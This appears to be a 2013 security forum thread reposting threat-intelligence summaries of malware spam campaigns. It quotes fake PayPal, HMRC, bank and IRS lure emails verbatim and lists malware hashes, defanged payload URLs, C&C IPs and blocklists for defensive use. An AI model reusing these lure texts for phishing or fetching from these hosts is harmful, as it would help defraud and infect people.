* https://www.virustotal.com/en-gb/file/ab07dbeca3a3a3703007949ed05a100f95ce89d7e937fe320222a7812c904d16/analysis/1384175853/

- https://www.virustotal.com/en-gb/ip-address/121.127.248.74/information/
___

Fake Paypal SPAM / Identity_Form_04182013.zip
- http://blog.dynamoo.com/2013/11/identity-issue-pp-716-097-521-587-spam.html
11 Nov 2013 - "For some reason EXE-in-ZIP attacks are all the rage at the moment, here is a -fake- spam pretending to be from PayPal with a malicious attachment:
Date: Mon, 11 Nov 2013 19:14:10 +0330 [10:44:10 EST]
From: Payroll Reports [payroll@ quickbooks .com]
Subject: Identity Issue #PP-716-097-521-587
We are writing you this email in regards to your PayPal account. In accordance with our
"Terms and Conditions", article 3.2., we would like to kindly ask you to confirm your
identity by completing the attached form. Please print this form and fill in the
requested information. Once you have filled out all the information on the form please
send it to verification@ paypal .com along with a personal identification document
(identity card, driving license or international passport) and a proof of address
submitted with our system ( bank account statement or utility bill )
Your case ID for this reason is PP-D503YC19DXP3
For your protection, we might limit your account access. We apologize for any
inconvenience this may cause.
Thanks, PayPal...

Attached is a file Identity_Form_04182013.zip which in turn contains Identity_Form_04182013.exe which as you might guess is malicious. VirusTotal detections are 16/47*, and automated analysis... shows an attempted connection to trc-sd .com which is the same domain seen in this attack**."
* https://www.virustotal.com/en-gb/file/ab07dbeca3a3a3703007949ed05a100f95ce89d7e937fe320222a7812c904d16/analysis/1384185446/

** http://blog.dynamoo.com/2013/11/to-all-employees-confidential-message.html
___

American Express Suspicious Activity Report Spam
- http://threattrack.tumblr.com/post/66684841364/american-express-suspicious-activity-report-spam
Nov 11, 2013 - "Subjects Seen:
Recent Activity Report - Incident #6U7X67B05H6NGET
Typical e-mail details:
As part of our security measures, we deliver appropriate monitoring of transactions and customers to identify potentially unusual or suspicious activity and transactions in the American Express online system.
Please review the “Suspicious Activity Report” document attached to this email.
Your Cardmember information is included in the upper-right corner of this document to help you recognize this as a customer service e-mail from American Express. To learn more about e-mail security or report a suspicious e-mail, please visit us at americanexpress .com/phishing
Thank you for your Cardmembership.
Sincerely,
Lindsey_Oneal
Tier III Support
American Express Account Security
Fraud Prevention and Detection Network

Malicious File Name and MD5:
Incident#<random>.zip(14F92A367A01C5AD8F0C4A7062000FE6)
Incident#.exe (77F23BC4F0ECB244FAA61163B07EAEC7)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/633dc733982657f7327c5dd769f322e8/tumblr_inline_mw3y824fCm1r6pupn.png

Tagged:
American Express: http://threattrack.tumblr.com/tagged/American-Express
Upatre: http://threattrack.tumblr.com/tagged/Upatre

:mad: :fear:

AplusWebMaster
2013-11-12, 21:13
FYI...

Dynamic DNS sites you might want to block ...
- http://blog.dynamoo.com/2013/11/dynamic-dns-sites-you-might-want-to.html
12 Nov 2013 - "These domains are used for dynamic DNS and are operated by a company called Dyn who offer a legitimate service, but unfortunately it is -abused- by malware writers. If you are the sort of organisation that blocks dynamic DNS IPs then I recommend that you consider blocking the following... listed in yellow have been identified as having some malware by Google, ones listed in red are blocked by Google. Ones listed in italics are flagged as malicious by SURBL*. The links go to the Google diagnostic page."
(Long list at the dynamoo URL above.)
* http://www.surbl.org/lists
___

Fake HMRC SPAM - HMRC_Message.zip and qualitysolicitors .com
- http://blog.dynamoo.com/2013/11/you-have-received-new-messages-from.html
12 Nov 2013 - "This fake HMRC spam comes with a malicious attachment. Because the spammers have copied-and-pasted the footer from somewhere random it also effectively joe jobs an innocent site called qualitysolicitors .com:
Date: Tue, 12 Nov 2013 05:29:28 -0500 [05:29:28 EST]
From: "noreply@hmrc .gov .uk" [noreply@hmrc .gov .uk]
Subject: You have received new messages from HMRC
Please be advised that one or more Tax Notices (P6, P6B) have been issued.
For the latest information on your Tax Notices (P6, P6B) please open attached report.
Please do not reply to this e-mail.
1.This e-mail and any files or documents transmitted with it are confidential and
intended solely for the use of the intended recipient. Unauthorised use, disclosure or
copying is strictly prohibited and may be unlawful. If you have received this e-mail in
error, please notify the sender at the above address and then delete the e-mail from your
system.
2. If you suspect that this e-mail may have been intercepted or amended, please
notify the sender. 3. Any opinions expressed in this e-mail are those of the individual
sender and not necessarily those of QualitySolicitors Punch Robson. 4. Please note that
this e-mail and any attachments have been created in the knowledge that internet e-mail
is not a 100% secure communications medium. It is your responsibility to ensure that they
are actually virus free. No responsibility is accepted by QualitySolicitors Punch Robson
for any loss or damage arising from the receipt of this e-mail or its contents.
QualitySolicitors Punch Robson: Main office 35 Albert Road Middlesbrough TS1 1NU
Telephone 01642 230700. Offices also at 34 Myton Road, Ingleby Barwick, Stockton On Tees,
TS17 0WG Telephone 01642 754050 and Unit E, Parkway Centre, Coulby Newham, Middlesbrough
TS8 0TJ Telephone 01642 233980 VAT no. 499 1588 77. Authorised and regulated by the
Solicitors Regulation Authority (57864). A full list of Partners names is available from
any of our offices...

... there's a ZIP file called HMRC_Message.zip which in turn contains a malicious executable HMRC_Message.exe which has a VirusTotal detection rate of 12/47*. Automated analysis tools... show that it attempts to communicate with alibra .co .uk on 78.137.113.21 (UKfastnet Ltd, UK) and then it attempts to download additional components from:
[donotclick]synchawards .com/a1.exe
[donotclick]itcbadnera .org/images/dot.exe
a1.exe has a detection rate of 16/47**, and Malwr reports further HTTP connections to:
[donotclick]59.106.185.23 /forum/viewtopic.php
[donotclick]new.data.valinformatique .net/5GmVjT.exe
[donotclick]hargobindtravels .com/38emc.exe
[donotclick]bonway-onza .com/d9c9.exe
[donotclick]friseur-freisinger .at/t5krH.exe
dot.exe has a much lower detection rate of 6/47***... various types of activity including keylogging and credential harvesting. There are also many, many HTTP connections to various hosts, I suspect this is attempting to mask the actual C&C servers it is connecting to.
a1.exe downloads several more files, all of which appear to be the same. The VirusTotal detection rate for these is 5/47***, Malwr reports several attempted IP connections that look a bit like peer-to-peer Zeus."
Recommended blocklist:
59.106.185.23 ..."
(More URLS listed at the dynamoo URL above.)
* https://www.virustotal.com/en-gb/file/c01fa56f1c18f2c4249606cb1cd8166118f026e3a7833005c2a01b58881dbbf9/analysis/1384264864/

** https://www.virustotal.com/en-gb/file/afb912f62363bdbbd667a3ef6ae5eff9adfd47c6e78171459306681dd8b04a50/analysis/1384265605/

*** https://www.virustotal.com/en-gb/file/c6221e19d2df42f2e1318a3c74c035802cb9dcc86923bd6c49f23bb13c130a86/analysis/1384266070/
___

Fake "Outlook Settings" SPAM - Outlook.zip
- http://blog.dynamoo.com/2013/11/important-new-outlook-settings-spam.html
12 Nov 2013 - "This spam email has a malicious attachment:
Date: Tue, 12 Nov 2013 16:22:38 +0100 [10:22:38 EST]
From: Undisclosed Recipients
Subject: Important - New Outlook Settings
Please carefully read the attached instructions before updating settings.
This file either contains encrypted master password, used to encrypt other files. Key archival has been implemented, in order to decrypt the file please use the following password: PaSdIaoQ
This e-mail and / or any attachment(s) is intended solely for the above-mentioned recipient(s) and it may contain confidential or privileged information. If you have received it in error, please notify us immediately at helpdesk@victimdomain and delete the e-mail. You must not copy it, distribute it, disclose it or take any action in reliance on it.

The body text of the spam contains a faked email address made to look like helpdesk@ the victim's domain. Attached to the email is a password-protected ZIP file Outlook.zip that has to be decoded with the PaSdIaoQ key in the body text of the email (hopefully intelligent people will realise that you wouldn't send the password with the encrypted attachment.. you'd have to be really daft to do that). Unzipping the file gives a malicious executable Outlook.exe which has an icon designed to look like Microsoft Outlook.
Screenshot: https://lh3.ggpht.com/-uZyweXA5n_g/UoJOXnVIA-I/AAAAAAAACPY/tKqQ0Ksz0To/s1600/outlook-icon.png
The detection rate at VirusTotal is 5/45*. Automated analysis tools... show an attempted connection to dchamt .com on 216.157.85.173 (Peer 1 Dedicated Hosting, US). That IP address contains about 70 websites which may or may not be clean."
* https://www.virustotal.com/en-gb/file/96d6e3a19d9f529dd1c8cda5460a77d1f9286213b1d8f42f4d1fb146a9132acf/analysis/1384270918/

- https://www.virustotal.com/en-gb/ip-address/216.157.85.173/information/

- http://threattrack.tumblr.com/post/66784403820/new-outlook-settings-spam
Nov 12, 2013 - "Subjects Seen:
Important - New Outlook Settings
Typical e-mail details:
Please carefully read the attached instructions before updating settings.
This file either contains encrypted master password, used to encrypt other files. Key archival has been implemented, in order to decrypt the file please use the following password: PaSdIaoQ
This e-mail and / or any attachment(s) is intended solely for the above-mentioned recipient(s) and it may contain confidential or privileged information. If you have received it in error, please notify us immediately at <sender e-mail address> and delete the e-mail. You must not copy it, distribute it, disclose it or take any action in reliance on it.

Malicious File Name and MD5:
Outlook.zip (4D0A70E1DD207785CB7067189D175679)
Outlook.exe (C8D22FA0EAA491235FA578857CE443DC)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/15b88d66ccc6974a6134c025cc9ad5a2/tumblr_inline_mw5rx8vTYV1r6pupn.png
___

Fake Tax/Accountant SPAM / tax 2012-2013.exe
- http://blog.dynamoo.com/2013/11/2012-and-2013-tax-documents-accountants.html
12 Nov 2013 - "This -fake- tax spam comes with a malicious attachment:
Date: Wed, 13 Nov 2013 00:44:46 +0800 [11:44:46 EST]
From: "support@ salesforce .com" [support@ salesforce .com]
Subject: FW: 2012 and 2013 Tax Documents; Accountant's Letter
I forward this file to you for review. Please open and view it.
Attached are Individual Income Tax Returns and W-2s for 2012 and 2013, plus an accountant's letter.
This email message may include single or multiple file attachments of varying types.
It has been MIME encoded for Internet e-mail transmission.

Attached to the file is a ZIP file called dlf2365.zip which contains a malicious executable file tax 2012-2013.exe which has an icon to make it look like a PDF file.
> https://lh3.ggpht.com/-4dRp1ML5c40/UoKNNvkL9pI/AAAAAAAACPo/3PTjlVby9Z8/s1600/tax-icon.png
VirusTotal detection rates are 17/47*. Automated analysis tools... show an attempted connection to nishantmultistate .com on 216.157.85.173 (Peer 1, US). This is the same server as used in this attack**, and you can safely assume that the whole server is compromised. Blocking this IP is probably a good idea."
* https://www.virustotal.com/en-gb/file/c792601ed172e0f235f6e7add5d4d8aa72cefc5c3427519492be080b9be128e0/analysis/1384287261/

** http://blog.dynamoo.com/2013/11/important-new-outlook-settings-spam.html
___

Department of Treasury Outstanding Obligation Spam
- http://threattrack.tumblr.com/post/66792822412/department-of-treasury-outstanding-obligation-spam
Nov 12, 2013 - "Subjects Seen:
Department of Treasury Notice of Outstanding Obligation - Case <random>
Typical e-mail details:
We have received notification from the Department of the Treasury,
Financial Management Service (FMS) that you have an outstanding
obligation with the Federal Government that requires your immediate
attention.
In order to ensure this condition does not affect any planned
contract or grant activity, please review and sign the attached document and if
you are unable to understand the attached document please call FMS at 1-800-304-3107
to address this issue. Please make sure the person making the telephone call has the
Taxpayer Identification Number available AND has the authority/knowledge
to discuss the debt for the contractor/grantee.

Malicious File Name and MD5:
FMS-Case-<random>.zip (55D31D613A6A5A57C07D496976129068)
FMS-Case-{_Case_DIG}.zip.exe (B807F603C69AEA97E900E59EC99315B5)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/74ca553a1712c3af975dfb32f39e1f04/tumblr_inline_mw5xr3YMit1r6pupn.png

:mad: :fear::fear:

AplusWebMaster
2013-11-13, 14:19
FYI...

Fake PayPal "Identity Issue" SPAM / Identity_Form_04182013.zip
- http://blog.dynamoo.com/2013/11/this-fake-paypal-or-is-it-quickbooks.html
13 Nov 2013 - "This -fake- PayPal (or is it Quickbooks?) spam has a malicious attachment:
Date: Wed, 13 Nov 2013 02:27:39 -0800 [05:27:39 EST]
From: Payroll Reports [payroll@ quickbooks .com]
Subject: Identity Issue #PP-679-223-724-838
We are writing you this email in regards to your PayPal account. In accordance with our
"Terms and Conditions", article 3.2., we would like to kindly ask you to confirm your
identity by completing the attached form. Please print this form and fill in the
requested information. Once you have filled out all the information on the form please
send it to verification@ paypal .com along with a personal identification document
(identity card, driving license or international passport) and a proof of address
submitted with our system ( bank account statement or utility bill )
Your case ID for this reason is PP-TEBY66KNZPMU
For your protection, we might limit your account access. We apologize for any
inconvenience this may cause.
Thanks,
PayPal ...

Attached is a file Identity_Form_04182013.zip which in turn contains Identity_Form_04182013.exe which has an icon to make it look like a PDF file.
> https://lh3.ggpht.com/-sx8_WjDsH10/UoNeT2WY8MI/AAAAAAAACP8/9ov_y4ZOpJI/s1600/identity-form.png
The detection rate for this at VirusTotal is 9/47*, automated analysis tools... shows an attempted connection to signsaheadgalway .com on 78.137.113.21 (UKfastnet Ltd, UK) which is the same server used in this attack**, so you can safely assume that the whole server is compromised and I recommend that you block that particular IP."
* https://www.virustotal.com/en-gb/file/6e4731ec02a08573524e2acd46493dc250315f486b3200abf7b51a0a55e31188/analysis/1384340556/

** http://blog.dynamoo.com/2013/11/you-have-received-new-messages-from.html
___

CareerBuilder Notification Spam
- http://threattrack.tumblr.com/post/66872856439/careerbuilder-notification-spam
Nov 13, 2013 - "Subjects Seen:
CareerBuilder Notification
Typical e-mail details:
Hello,
I am a customer service employee at CareerBuilder. I found a vacant position that you may be interested in based on information from your resume or a recent online submission you made on our site.
You can review the position on the CareerBuilder by downloading the attached PDF file.
Attached file is scanned in PDF format.
Adobe(R)Reader(R) can be downloaded from the following URL: adobe.com
Best wishes in your job search !
Savannah_Moyer
Careerbuilder Customer Service Team

Malicious File Name and MD5:
CB_Offer_<random>.zip (B61D44F18092458F7B545A16D2FF77D6)
CB_Offer_<random>.exe (40AB8B0050E496FB00F499212B600DDB)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/f04c30490974e668e917a2b953c45753/tumblr_inline_mw7h9fdQrQ1r6pupn.png

Tagged:
CareerBuilder: http://threattrack.tumblr.com/tagged/CareerBuilder
Upatre: http://threattrack.tumblr.com/tagged/Upatre
___

Facebook Password Request Spam
- http://threattrack.tumblr.com/post/66873997398/facebook-password-request-spam
Nov 13, 2013 - "Subjects Seen:
You requested a new Facebook password!
Typical e-mail details:
Hello,
You have received a secure message. You will be prompted to open (view) the file or save (download) it to your computer. For best results, save the file first, then open it.
Read your secure message by opening the attachment, Facebook-SecureMessage.zip.

Malicious File Name and MD5:
Facebook-SecureMessage.zip (FE3AB674A321959B3EA83CF54666A763)
Transaction_{_tracking}.exe (95191C75EF4A87CBFA46C0818009312E)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/0d5ef87b8b15f44b0c999e8ca90912df/tumblr_inline_mw7iewKvP31r6pupn.png

Tagged:
Facebook: http://threattrack.tumblr.com/tagged/Facebook
Upatre: http://threattrack.tumblr.com/tagged/Upatre
___

EXE-in-ZIP SPAM storm continues
- http://blog.dynamoo.com/2013/11/the-exe-in-zip-spam-storm-continues.html
13 Nov 2013 - "Two more EXE-in-ZIP spams.. the first is a terse one with a subject "Voice Message from Unknown Caller" or "Voicemail Message from unknown number" not much else with a malicious EXE-in-ZIP (VoiceMessage.zip) attachment with VirusTotal score of 7/46* which calls home... to amandas-designs .com on 80.179.141.8 (012 Smile Communications Ltd., Israel)

The second one is a -fake- Wells Fargo spam similar to this:
We have received this documents from your bank, please review attached documents.
Lela Orozco
Wells Fargo Advisors
817-232-5887 office
817-067-3871 cell Lela.Orozco@ wellsfargo .com
Investments in securities and insurance products are:
NOT FDIC-INSURED/NO BANK-GUARANTEES/MAY LOSE VALUE
Wells Fargo Advisors, LLC is a nonbank affiliate of Wells Fargo & Company, Member
FINRA/SIPC. 1 North Jefferson, St. Louis, MO 63103 ...

In this case the EXE-in-ZIP attachment (BankDocs.zip) has a VirusTotal detection rate of 14/47** and calls home... to kidgrandy .com on 184.154.15.190 (Singlehop, US). Given the massive onslaught of EXE-in-ZIP spam, I would strongly recommend blocking ZIP files with executables in them at the perimeter."
* https://www.virustotal.com/en-gb/file/4f8a8db1d66a8172ae46abd2ff2c9f576a48dccd3d7d4334c439caf98f8c0979/analysis/1384377409/

** https://www.virustotal.com/en-gb/file/5bda57e0cca9728ad56314c90a54c61c51edf3d3b7c548056041f81660d0d667/analysis/1384377605/

- https://www.virustotal.com/en/ip-address/80.179.141.8/information/

- https://www.virustotal.com/en/ip-address/184.154.15.190/information/

:mad: :fear:

AplusWebMaster
2013-11-14, 14:13
FYI...

Google Drive phish...
- http://www.threattracksecurity.com/it-blog/google-drive-phish-deploys-data-uri-technique/
Nov 14, 2013 - "... interesting mail which arrived in my inbox earlier today. It came from a Gmail address tied to a Google+ account which appears to be Chinese in origin, and had me BCC’d in.
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/11/cheedrive1.jpg
The email is called “Document”... This might look convincing to the unwary, but a simple hover over the link reveals that this isn’t going to take you to Google Drive:
bashoomal(dot)com/redirect.html
The end-user will be presented with a -fake- Google Drive login page which asks them to fill in their email address / password.
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/11/cheedrive2.jpg
As you can see from the URL bar, this is another -phish- that tries to take advantage of the Data URI scheme... The Google account sending the mails appears to have been around since 2007, and also has a Youtube account – it seems likely that it has been compromised, and is being used to further the spread of malicious links..."

- https://isc.sans.edu/diary.html?storyid=17018
2013-11-13
___

Malware sites to block - (Caphaw)
- http://blog.dynamoo.com/2013/11/malware-sites-to-block-14112013-caphaw.html
14 Nov 2013 - "These domains and IPs appear to be involved in a Caphaw malware attack, such as this one*. All the IPs involved belong to Hetzner in Germany, and although some also host legitimate sites I would strongly recommend blocking them.
Recommended blocklist:
141.8.225.5
46.4.47.20
46.4.47.22
88.198.57.178 ..."
(More listed at the dynamoo URL above.)
* http://urlquery.net/report.php?id=7696954

- http://www.virusradar.com/en/Win32_Caphaw.K/description

:mad::fear:

AplusWebMaster
2013-11-15, 17:58
FYI...

More Malware sites to block - (Caphaw)
- http://blog.dynamoo.com/2013/11/malware-sites-to-block-15112013-caphaw.html
15 Nov 2013 - "Thanks to a tip to investigate 199.68.199.178 I discovered that the Caphaw network I looked at yesterday* is much bigger than I thought. The following IPs and domains can all be regarded as malicious (.SU domains are normally a dead giveaway for evil activity). The recommended blocklist is at the end of the post (highlighted). These are the hosts involved either now or recently with hosting these Caphaw domains..."
(Long list at the dynamoo URL above.)
* http://blog.dynamoo.com/2013/11/malware-sites-to-block-14112013-caphaw.html

- https://www.virustotal.com/en/ip-address/199.68.199.178/information/

- http://www.virusradar.com/en/Win32_Caphaw/detail
___

Fake BoA fax message SPAM / 442074293440-1116-084755-242.zip
- http://blog.dynamoo.com/2013/11/ringcentral-bank-of-america-fax-message.html
15 Nov 2013 - "This -fake- fax message email has a malicious attachment:
Date: Fri, 15 Nov 2013 12:05:36 -0500 [12:05:36 EST]
From: RingCentral [notify-us@ ringcentral .com]
Subject: New Fax Message on 11/15/2013 at 09:51:51 CST
You Have a New Fax Message
From
Bank of America
Received: 11/15/2013 at 09:51:51 CST
Pages: 5
To view this message, please open the attachment.
Thank you for using Ring Central .

Screenshot: https://lh3.ggpht.com/-bw4CETLVd5I/UoZep7qACkI/AAAAAAAACQg/hq_7rR1l0nc/s1600/ringcentral.png

There is an attachment 442074293440-1116-084755-242.zip which unzips into a malicious exectuable 442074293440-1116-084755-242.exe which has a VirusTotal detection rate of 11/47*. Automated analysis tools... show an attempted connection to aspenhonda .com on 199.167.40.33 (FAM Info Systems / ServInt, US). The domain in question has been -hacked-, it is not possible to tell if the entire server is compromised but there are other legitimate sites on that box."
* https://www.virustotal.com/en-gb/file/fa877e587e5ae611d3a1f6c27cc2629efcaebad39084bc3a6fb1496b076c643d/analysis/1384537461/

- https://www.virustotal.com/en/ip-address/199.167.40.33/information/
___

Citigroup Secure Message Spam
- http://threattrack.tumblr.com/post/67060979477/citigroup-secure-message-spam
Nov 15, 2013 - "Subjects Seen:
You have a new encrypted message from Citigroup Inc.
Typical e-mail details:
You have received a secure e-mail message from Citigroup Inc..
We care about your privacy, Citigroup Inc. uses this secure way to exchange e-mails containing personal information.
Read your secure message by opening the attachment. You will be prompted to save (download) it to your computer.
If you have concerns about the validity of this message, please contact the sender directly.
First time users - will need to register after opening the attachment.

Malicious File Name and MD5:
SecureMessage.zip (969AEFFE28BC771C8453BF849450BC6A)
SecureMessage.exe(C2CD447FD9B19B7F062A5A8CF6299600)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/b1298b867cb6486caf9d64497db4a0e7/tumblr_inline_mwb9gyugMb1r6pupn.png

Tagged: CitiGroup, Upatre
___

Threat Outbreak Alerts
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Fake Authorization Form Email Messages - 2013 Nov 15
Fake Product Purchase Order Email Messages - 2013 Nov 15
Fake Payment Receipt Email Messages - 2013 Nov 15
Malicious Personal Pictures Attachment Email Messages - 2013 Nov 15
Fake Bank Payment Notification Email Messages - 2013 Nov 15
Fake Product Order Email Messages - 013 Nov 15
Fake Meeting Invitation Email Messages - 2013 Nov 15
Fake Payroll Invoice Notification Email Messages - 2013 Nov 15
Fake Product Quote Request Email Messages - 2013 Nov 15
Fake Shipping Order Information Email Messages - 2013 Nov 15
Fake Shipping Notification Email Messages - 2013 Nov 15
Fake Product Inquiry Email Messages - 2013 Nov 15
Fake Payment Receipt Email Messages - 2013 Nov 15
Fake Tax Document Email Messages - 2013 Nov 15
Fake Travel Information Email Messages - 2013 Nov 15
Email Messages with Malicious Attachments - 2013 Nov 15
(More detail and links at the cisco URL above.)

:mad: :fear:

AplusWebMaster
2013-11-18, 15:41
FYI...

Phone SCAM - (08445715179)
- http://blog.dynamoo.com/2013/11/0844-number-scam-08445715179.html
18 Nov 2013 - "This is a particularly insidious scam that relies on mobile phone users in the UK not knowing that an 0844 number is much, much more expensive than a normal phone call. The scam SMS goes something like this:
ATTENTION! We have tried to contact you, It is important we speak to you today. Please call 08445715179 quoting your reference 121190. Thank You.

In this case the sender's number was +447453215347 (owned by Virgin Media Wholesale Ltd, but operated by a third party). The catch is that the calls to an 0844 number can cost up to 40p per minute (see more details here*), a large chunk of which goes into the operator's pockets. So what happens when you ring back? You get put on hold.. and left on hold until you have racked up a significant bill. Sadly, I don't know who is behind this scam, and in this case it was -illegally- sent to a TPS-registered number**. If you get one of these, you should forward the spam and the sender's number to your carrier. In the case of T-Mobile, O2 and Orange the number to report to is 7726 ("SPAM"). Vodafone customers should use 87726 ("VSPAM") and Three customers should use 37726 ("3SPAM"). Hopefully the carriers will act if there are enough complaints. You should also send a complaint to the ICO*** who may be able to take more serious action against these spammers."
* http://www.moneysavingexpert.com/news/phones/2013/08/how-much-do-08-numbers-really-cost-dont-get-fleeced-by-premium-rate-calls

** http://www.tpsonline.org.uk/tps/number_type.html

*** http://www.ico.org.uk/complaints/marketing/2
___

Freenters Hit By Breach, Student Data Leaked
- http://www.threattracksecurity.com/it-blog/freenters-hit-breach-student-data/
Nov 18, 2013 - "If you’re a student who signed up to the Freenters free printing service, you may want to go and ensure your logins are safe and sound, as it appears they were compromised pretty badly.
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/11/printpwn11.jpg
... Affected students were sent two separate emails which added to the confusion, with one stating “Passwords were secure” with a follow up advising them “we highly recommend you change your password for other accounts”... This might be a perfect time to ensure you’re not sharing passwords across sites and services, and think about using a password manager..."
___

PlayStation 4 and Xbox One Survey Scams ...
- http://blog.trendmicro.com/trendlabs-security-intelligence/playstation-4-and-xbox-one-survey-scams-spotted/
Nov 18, 2013 - "... We found a Facebook page that advertised a PS4 raffle. Users were supposed to visit the advertised site, as seen below:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/11/ps4-1.jpg
The site urges users to “like” or “follow” the page, and then share it on social media sites. This could be a way for scammers to gain a wider audience or appear more reputable.
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/11/ps4-2.jpg
Afterwards, users are required to enter their name and email address. Instead of a raffle, they are led to a survey scam:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/11/ps4-3.jpg
... Scams are also using the Xbox One as bait. However, the site in this currently inaccessible. Since the Xbox One has yet to be released, scammers could be waiting for the official launch before making the site live.
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/11/xbox1.jpg
The scams were not limited to Facebook. We spotted a site that advertised a Xbox One giveaway. Like the PS4 scam, users are encouraged to promote the giveaway through social media. Once they click the “proceed” button, they are led to a site that contains a text file they need for the raffle. But like other scams, this simply leads to a survey site.
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/11/xbox2.jpg
... Product launches have become a tried-and-tested social engineering bait. Earlier in the year, we saw scams that used Google Glass as a way to trick users. Early last year, the launch of the iPad 3 became the subject of many scams and spam. Users should always be cautious when it comes to online raffles and giveaways, especially from unknown or unfamiliar websites. If the deal seems too good to be true, it probably is..."
___

Netflix on your PC - Beware of Silverlight exploit
- http://blog.malwarebytes.org/exploits-2/2013/11/streaming-netflix-on-your-pc-beware-of-silverlight-exploit/
Nov 15, 2013 - "A vulnerability affecting Microsoft Silverlight 5 is being used in the wild to infect PCs that visit compromised or malicious websites... The flaw, which exists in versions prior to 5.1.20125.0, allows attackers to execute arbitrary code on the affected systems without any user interaction. Microsoft patched the flaw (CVE-2013-0074*) on March 12, 2013. The Silverlight exploit was first spotted in the Angler exploit kit by @EKWatcher and later documented by Kafeine. The screenshot below summarizes the attack:
> http://cdn.blog.malwarebytes.org/wp-content/uploads/2013/11/screenshot_2013-11-13_016.png
... those that already have an older version of Silverlight can still watch Netflix and may not be aware that their computers are at risk. Please ensure that you are running the latest version available (5.1.20913.0) and that it is set to install updates automatically:
> http://cdn.blog.malwarebytes.org/wp-content/uploads/2013/11/silverlight.png "

* http://technet.microsoft.com/en-us/security/bulletin/ms13-022
___

IRS Tax Payment Rejection Spam
- http://threattrack.tumblr.com/post/67401200848/irs-tax-payment-rejection-spam
Nov 18, 2013 - "Subjects Seen:
Your FED TAX payment ( ID : 6LHIRS930292818 ) was Rejected
Typical e-mail details:
*** PLEASE DO NOT RESPOND TO THIS EMAIL ***
Your federal Tax payment (ID: 6LHIRS930292818), recently sent from your checking account was returned by the your financial institution.
For more information, please download notification, using your security PIN 55178.
Transaction Number: 6LHIRS930292818
Payment Amount: $ 2373.00
Transaction status: Rejected
ACH Trace Number: 268976180630733
Transaction Type: ACH Debit Payment-DDA

Malicious File Name and MD5:
FED TAX payment.zip (661649A0CA9F13B06056B53B9BC3CBA7)
FED TAX payment.exe (157BBC283245BBE5AB2947C446857FC9)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/7f7ede2a153c661ffd968854d85937b7/tumblr_inline_mwhbufHbhC1r6pupn.png

Tagged: IRS, Upatre

:mad: :fear:

AplusWebMaster
2013-11-19, 13:24
FYI...

Fake ‘Sent from my iPhone’ themed emails - expose users to malware
- http://www.webroot.com/blog/2013/11/19/cybercriminals-spamvertise-tens-thousands-fake-sent-iphone-themed-emails-expose-users-malware/
Nov 19, 2013 - "Cybercriminals are currently mass mailing tens of thousands of malicious emails, supposedly including a photo attachment that’s been “Sent from an iPhone”. The social engineering driven spam campaign is, however, the latest attempt by a cybercriminal/group of cybercriminals that we’ve been monitoring for a while, to attempt to trick gullible users into unknowingly joining the botnet operated by the malicious actor(s) behind the campaign. Detection rate for the spamvertised attachment: MD5: 46e077f058f5a6eddee3c851f8e56838 – * ... Trojan.Win32.Neurevt.jl; Trojan:Win32/Neurevt.A... Once executed, the sample attempts to contact the following C&C servers:
91.109.14.224
31.7.35.112
49.50.8.93
173.0.131.15
209.50.251.101
88.198.7.211
64.120.153.69
219.94.206.70
173.231.139.57
next to the well known by now, networksecurityx.hopto .org (1) a C&C host..."
* https://www.virustotal.com/en/file/58496093758ee50877ce8453987259bf30d4222d0954525d89011909a0466217/analysis/1384441224/

Diagnostic page for hopto .org
1) http://google.com/safebrowsing/diagnostic?site=hopto.org/
"... Part of this site was listed for suspicious activity 731 time(s) over the past 90 days... Malicious software includes 817 exploit(s), 113 trojan(s), 59 virus. Successful infection resulted in an average of 5 new process(es) on the target machine. This site was hosted on 80 network(s)... Over the past 90 days, hopto .org appeared to function as an intermediary for the infection of 140 site(s)... this site has hosted malicious software over the past 90 days. It infected 210 domain(s)..."
___

Fake Snapchat downloads in Search Engine Ads
- http://www.threattracksecurity.com/it-blog/fake-snapchat-downloads-search-engine-ads/
Nov 19, 2013 - "Hot on the heels of fake Snapchat Adware installs*, we have advert results in both Google and Bing adverts leading to non-existent downloads of Snapchat in return for an Adware bundle. Here’s Google:
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/11/snapchat-googlesearch.png
The site in question here is soft1d(dot)com
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/11/soft1dprompt.jpg
Here’s Bing:
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/11/snapadsbing.jpg
The ad in question is the one in the bottom right hand corner for download-apps(dot)org/snapchat
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/11/download-apps-snap.jpg
Both sites lead to the same install. Comments from Matthew, one of our researchers in the Labs who discovered this: 'When you run the installer it precedes to install Fast Media Converter (Zango/Pinball Corp/BlinkX/LeadImpact) and LyricsViewer (Crossrider) with the only notice being from the page shown in the “prompt” screenshots. After loading those, it proceeds to offer you some more: a Conduit Toolbar and Dealply. In the end there is no Snapchat install or even a replacement for Snapchat'...
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/11/ignition-snap-1.png
.
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/11/ignition-snap-3.png
VirusTotal has this one pegged at 4/47** ..."
* http://www.threattracksecurity.com/it-blog/fake-snapchat-install-leads-adware/
Nov 1, 2013
** https://www.virustotal.com/en/file/1616385d2eb89a60387a5d42f598987063ad932f6d3793bdee4a57b8bb504b40/analysis/
___

Threat Outbreak Alerts
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Fake Job Offer Notification Email Messages - 2013 Nov 19
Fake Monthly Report Notification Email Messages - 2013 Nov 19
Fake Invoice Attachment Email Messages - 2013 Nov 19
